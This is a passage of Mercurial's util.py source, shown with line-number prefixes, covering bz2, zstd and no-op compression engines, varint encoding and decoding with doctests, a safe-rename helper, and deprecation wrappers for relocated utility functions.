3456 3457 def decompressorreader(self, fh):
3457 3458 def gen():
3458 3459 # The input stream doesn't have the 'BZ' header. So add it back.
3459 3460 d = bz2.BZ2Decompressor()
3460 3461 d.decompress('BZ')
3461 3462 for chunk in filechunkiter(fh):
3462 3463 yield d.decompress(chunk)
3463 3464
3464 3465 return chunkbuffer(gen())
3465 3466
3466 3467 compengines.register(_truncatedbz2engine())
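# Standalone illustration of the header replay trick above (comment only),
# using the stdlib directly on a stream whose 'BZ' magic was stripped
# (``headerless_chunk`` is a placeholder for such data):
#
#   d = bz2.BZ2Decompressor()
#   d.decompress('BZ')               # re-inject the two stripped magic bytes
#   out = d.decompress(headerless_chunk)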
3467 3468
3468 3469 class _noopengine(compressionengine):
3469 3470 def name(self):
3470 3471 return 'none'
3471 3472
3472 3473 def bundletype(self):
3473 3474 """No compression is performed.
3474 3475
3475 3476 Use this compression engine to explicitly disable compression.
3476 3477 """
3477 3478 return 'none', 'UN'
3478 3479
3479 3480 # Clients always support uncompressed payloads. Servers don't advertise
3480 3481 # them by default because, unless you are on a fast network, uncompressed
3481 3482 # payloads can easily saturate the network pipe.
3482 3483 def wireprotosupport(self):
3483 3484 return compewireprotosupport('none', 0, 10)
3484 3485
3485 3486 # We don't implement revlogheader because it is handled specially
3486 3487 # in the revlog class.
3487 3488
3488 3489 def compressstream(self, it, opts=None):
3489 3490 return it
3490 3491
3491 3492 def decompressorreader(self, fh):
3492 3493 return fh
3493 3494
3494 3495 class nooprevlogcompressor(object):
3495 3496 def compress(self, data):
3496 3497 return None
3497 3498
3498 3499 def revlogcompressor(self, opts=None):
3499 3500 return self.nooprevlogcompressor()
3500 3501
3501 3502 compengines.register(_noopengine())
3502 3503
3503 3504 class _zstdengine(compressionengine):
3504 3505 def name(self):
3505 3506 return 'zstd'
3506 3507
3507 3508 @propertycache
3508 3509 def _module(self):
3509 3510 # Not all installs have the zstd module available. So defer importing
3510 3511 # until first access.
3511 3512 try:
3512 3513 from . import zstd
3513 3514 # Force delayed import.
3514 3515 zstd.__version__
3515 3516 return zstd
3516 3517 except ImportError:
3517 3518 return None
3518 3519
3519 3520 def available(self):
3520 3521 return bool(self._module)
3521 3522
3522 3523 def bundletype(self):
3523 3524 """A modern compression algorithm that is fast and highly flexible.
3524 3525
3525 3526 Only supported by Mercurial 4.1 and newer clients.
3526 3527
3527 3528 With the default settings, zstd compression is both faster and yields
3528 3529 better compression than ``gzip``. It also frequently yields better
3529 3530 compression than ``bzip2`` while operating at much higher speeds.
3530 3531
3531 3532 If this engine is available and backwards compatibility is not a
3532 3533 concern, it is likely the best available engine.
3533 3534 """
3534 3535 return 'zstd', 'ZS'
3535 3536
3536 3537 def wireprotosupport(self):
3537 3538 return compewireprotosupport('zstd', 50, 50)
3538 3539
3539 3540 def revlogheader(self):
3540 3541 return '\x28'
3541 3542
3542 3543 def compressstream(self, it, opts=None):
3543 3544 opts = opts or {}
3544 3545 # zstd level 3 is almost always significantly faster than zlib
3545 3546 # while providing no worse compression. It strikes a good balance
3546 3547 # between speed and compression.
3547 3548 level = opts.get('level', 3)
3548 3549
3549 3550 zstd = self._module
3550 3551 z = zstd.ZstdCompressor(level=level).compressobj()
3551 3552 for chunk in it:
3552 3553 data = z.compress(chunk)
3553 3554 if data:
3554 3555 yield data
3555 3556
3556 3557 yield z.flush()
3557 3558
3558 3559 def decompressorreader(self, fh):
3559 3560 zstd = self._module
3560 3561 dctx = zstd.ZstdDecompressor()
3561 3562 return chunkbuffer(dctx.read_from(fh))
3562 3563
3563 3564 class zstdrevlogcompressor(object):
3564 3565 def __init__(self, zstd, level=3):
3565 3566 # Writing the content size adds a few bytes to the output. However,
3566 3567 # it allows decompression to be more efficient since we can
3567 3568 # pre-allocate a buffer to hold the result.
3568 3569 self._cctx = zstd.ZstdCompressor(level=level,
3569 3570 write_content_size=True)
3570 3571 self._dctx = zstd.ZstdDecompressor()
3571 3572 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3572 3573 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3573 3574
3574 3575 def compress(self, data):
3575 3576 insize = len(data)
3576 3577 # Caller handles empty input case.
3577 3578 assert insize > 0
3578 3579
3579 3580 if insize < 50:
3580 3581 return None
3581 3582
3582 3583 elif insize <= 1000000:
3583 3584 compressed = self._cctx.compress(data)
3584 3585 if len(compressed) < insize:
3585 3586 return compressed
3586 3587 return None
3587 3588 else:
3588 3589 z = self._cctx.compressobj()
3589 3590 chunks = []
3590 3591 pos = 0
3591 3592 while pos < insize:
3592 3593 pos2 = pos + self._compinsize
3593 3594 chunk = z.compress(data[pos:pos2])
3594 3595 if chunk:
3595 3596 chunks.append(chunk)
3596 3597 pos = pos2
3597 3598 chunks.append(z.flush())
3598 3599
3599 3600 if sum(map(len, chunks)) < insize:
3600 3601 return ''.join(chunks)
3601 3602 return None
3602 3603
3603 3604 def decompress(self, data):
3604 3605 insize = len(data)
3605 3606
3606 3607 try:
3607 3608 # This was measured to be faster than other streaming
3608 3609 # decompressors.
3609 3610 dobj = self._dctx.decompressobj()
3610 3611 chunks = []
3611 3612 pos = 0
3612 3613 while pos < insize:
3613 3614 pos2 = pos + self._decompinsize
3614 3615 chunk = dobj.decompress(data[pos:pos2])
3615 3616 if chunk:
3616 3617 chunks.append(chunk)
3617 3618 pos = pos2
3618 3619 # Frame should be exhausted, so no finish() API.
3619 3620
3620 3621 return ''.join(chunks)
3621 3622 except Exception as e:
3622 3623 raise error.RevlogError(_('revlog decompress error: %s') %
3623 3624 stringutil.forcebytestr(e))
3624 3625
3625 3626 def revlogcompressor(self, opts=None):
3626 3627 opts = opts or {}
3627 3628 return self.zstdrevlogcompressor(self._module,
3628 3629 level=opts.get('level', 3))
3629 3630
3630 3631 compengines.register(_zstdengine())
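# Round-trip sketch for the revlog compressor above (comment only; requires
# the optional bundled ``zstd`` module, hence the ``available()`` guard):
#
#   eng = compengines['zstd']
#   if eng.available():
#       c = eng.revlogcompressor()
#       blob = c.compress('x' * 1000)   # None when compression isn't a win
#       if blob is not None:
#           assert c.decompress(blob) == 'x' * 1000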
3631 3632
3632 3633 def bundlecompressiontopics():
3633 3634 """Obtains a list of available bundle compressions for use in help."""
3634 3635 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3635 3636 items = {}
3636 3637
3637 3638 # We need to format the docstring. So use a dummy object/type to hold it
3638 3639 # rather than mutating the original.
3639 3640 class docobject(object):
3640 3641 pass
3641 3642
3642 3643 for name in compengines:
3643 3644 engine = compengines[name]
3644 3645
3645 3646 if not engine.available():
3646 3647 continue
3647 3648
3648 3649 bt = engine.bundletype()
3649 3650 if not bt or not bt[0]:
3650 3651 continue
3651 3652
3652 3653 doc = pycompat.sysstr('``%s``\n %s') % (
3653 3654 bt[0], engine.bundletype.__doc__)
3654 3655
3655 3656 value = docobject()
3656 3657 value.__doc__ = doc
3657 3658 value._origdoc = engine.bundletype.__doc__
3658 3659 value._origfunc = engine.bundletype
3659 3660
3660 3661 items[bt[0]] = value
3661 3662
3662 3663 return items
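# For example (comment only), with the zlib engine registered above the
# returned mapping contains an item keyed 'gzip' whose docstring begins:
#
#   ``gzip``
#    zlib compression using the DEFLATE algorithm.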
3663 3664
3664 3665 i18nfunctions = bundlecompressiontopics().values()
3665 3666
3666 3667 # convenient shortcut
3667 3668 dst = debugstacktrace
3668 3669
3669 3670 def safename(f, tag, ctx, others=None):
3670 3671 """
3671 3672 Generate a name that is safe to rename f to in the given context.
3672 3673
3673 3674 f: filename to rename
3674 3675 tag: a string tag that will be included in the new name
3675 3676 ctx: a context, in which the new name must not exist
3676 3677 others: a set of other filenames that the new name must not be in
3677 3678
3678 3679 Returns a file name of the form oldname~tag[~number] which does not exist
3679 3680 in the provided context and is not in the set of other names.
3680 3681 """
3681 3682 if others is None:
3682 3683 others = set()
3683 3684
3684 3685 fn = '%s~%s' % (f, tag)
3685 3686 if fn not in ctx and fn not in others:
3686 3687 return fn
3687 3688 for n in itertools.count(1):
3688 3689 fn = '%s~%s~%s' % (f, tag, n)
3689 3690 if fn not in ctx and fn not in others:
3690 3691 return fn
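# Behaviour sketch (comment only, hypothetical arguments): with f='foo' and
# tag='backup', this returns 'foo~backup' when that name is free, otherwise
# the first unused candidate among 'foo~backup~1', 'foo~backup~2', ...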
3691 3692
3692 3693 def readexactly(stream, n):
3693 3694 '''read n bytes from stream.read and abort if fewer are available'''
3694 3695 s = stream.read(n)
3695 3696 if len(s) < n:
3696 3697 raise error.Abort(_("stream ended unexpectedly"
3697 3698 " (got %d bytes, expected %d)")
3698 3699 % (len(s), n))
3699 3700 return s
3700 3701
3701 3702 def uvarintencode(value):
3702 3703 """Encode an unsigned integer value to a varint.
3703 3704
3704 3705 A varint is a variable length integer of 1 or more bytes. Each byte
3705 3706 except the last has the most significant bit set. The lower 7 bits of
3706 3707 each byte store the 2's complement representation, least significant group
3707 3708 first.
3708 3709
3709 3710 >>> uvarintencode(0)
3710 3711 '\\x00'
3711 3712 >>> uvarintencode(1)
3712 3713 '\\x01'
3713 3714 >>> uvarintencode(127)
3714 3715 '\\x7f'
3715 3716 >>> uvarintencode(1337)
3716 3717 '\\xb9\\n'
3717 3718 >>> uvarintencode(65536)
3718 3719 '\\x80\\x80\\x04'
3719 3720 >>> uvarintencode(-1)
3720 3721 Traceback (most recent call last):
3721 3722 ...
3722 3723 ProgrammingError: negative value for uvarint: -1
3723 3724 """
3724 3725 if value < 0:
3725 3726 raise error.ProgrammingError('negative value for uvarint: %d'
3726 3727 % value)
3727 3728 bits = value & 0x7f
3728 3729 value >>= 7
3729 3730 bytes = []
3730 3731 while value:
3731 3732 bytes.append(pycompat.bytechr(0x80 | bits))
3732 3733 bits = value & 0x7f
3733 3734 value >>= 7
3734 3735 bytes.append(pycompat.bytechr(bits))
3735 3736
3736 3737 return ''.join(bytes)
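    # Worked example for the 1337 doctest above: 1337 is 0b10100111001; the
    # low seven bits 0b0111001 (0x39) gain the continuation bit 0x80, giving
    # 0xb9, and the remaining bits 1337 >> 7 == 10 (0x0a, rendered as '\n')
    # form the final byte -- hence '\xb9\n'.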
3737 3738
3738 3739 def uvarintdecodestream(fh):
3739 3740 """Decode an unsigned variable length integer from a stream.
3740 3741
3741 3742 The passed argument is anything that has a ``.read(N)`` method.
3742 3743
3743 3744 >>> try:
3744 3745 ... from StringIO import StringIO as BytesIO
3745 3746 ... except ImportError:
3746 3747 ... from io import BytesIO
3747 3748 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3748 3749 0
3749 3750 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3750 3751 1
3751 3752 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3752 3753 127
3753 3754 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3754 3755 1337
3755 3756 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3756 3757 65536
3757 3758 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3758 3759 Traceback (most recent call last):
3759 3760 ...
3760 3761 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3761 3762 """
3762 3763 result = 0
3763 3764 shift = 0
3764 3765 while True:
3765 3766 byte = ord(readexactly(fh, 1))
3766 3767 result |= ((byte & 0x7f) << shift)
3767 3768 if not (byte & 0x80):
3768 3769 return result
3769 3770 shift += 7
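    # Worked decode of '\xb9\n' (comment only): byte 0xb9 contributes its
    # low seven bits (0x39 == 57) at shift 0 and has the continuation bit
    # set; byte 0x0a then contributes 10 << 7 == 1280, and 1280 + 57 == 1337.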
3770 3771
3771 3772 ###
3772 3773 # Deprecation warnings for util.py splitting
3773 3774 ###
3774 3775
3775 3776 def _deprecatedfunc(func, version, modname=None):
3776 3777 def wrapped(*args, **kwargs):
3777 3778 fn = pycompat.sysbytes(func.__name__)
3778 3779 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 3780 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 3781 nouideprecwarn(msg, version)
3781 3782 return func(*args, **kwargs)
3782 3783 wrapped.__name__ = func.__name__
3783 3784 return wrapped
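# For example (comment only), calling the ``makedate`` alias below emits a
# deprecation warning of the form:
#
#   'util.makedate' is deprecated, use 'utils.dateutil.makedate'
#
# tagged with the version given at wrap time ('4.6').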
3784 3785
3785 3786 defaultdateformats = dateutil.defaultdateformats
3786 3787 extendeddateformats = dateutil.extendeddateformats
3787 3788 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 3789 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 3790 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 3791 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 3792 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 3793 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 3794 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794 3795
3795 3796 stderr = procutil.stderr
3796 3797 stdin = procutil.stdin
3797 3798 stdout = procutil.stdout
3798 3799 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 3800 modname='utils.procutil')
3800 3801 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 3802 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 3803 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 3804 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 3805 modname='utils.procutil')
3805 3806 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 3807 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 3808 modname='utils.procutil')
3808 3809 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 3810 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 3811 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 3812 modname='utils.procutil')
3812 3813 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 3814 modname='utils.procutil')
3814 3815 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 3816 modname='utils.procutil')
3816 3817 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 3818 modname='utils.procutil')
3818 3819 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 3820 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3820 3821 try:
3821 3822 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 3823 modname='utils.procutil')
3823 3824 except AttributeError:
3824 3825 pass
3825 3826 try:
3826 3827 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 3828 modname='utils.procutil')
3828 3829 except AttributeError:
3829 3830 pass
3830 3831 closefds = procutil.closefds
3831 3832 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3832 3833 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3833 3834 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3834 3835 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3835 3836 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3836 3837 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3837 3838 filter = _deprecatedfunc(procutil.filter, '4.6')
3838 3839 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3839 3840 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3840 3841 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3841 3842 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3842 3843 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3843 3844 system = _deprecatedfunc(procutil.system, '4.6')
3844 3845 gui = _deprecatedfunc(procutil.gui, '4.6')
3845 3846 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3846 3847 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3847 3848
3848 3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3849 3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3850 3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3851 3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3852 3853 email = _deprecatedfunc(stringutil.email, '4.6')
3853 3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3854 3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3855 3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3856 3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3857 3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3858 3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3859 3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')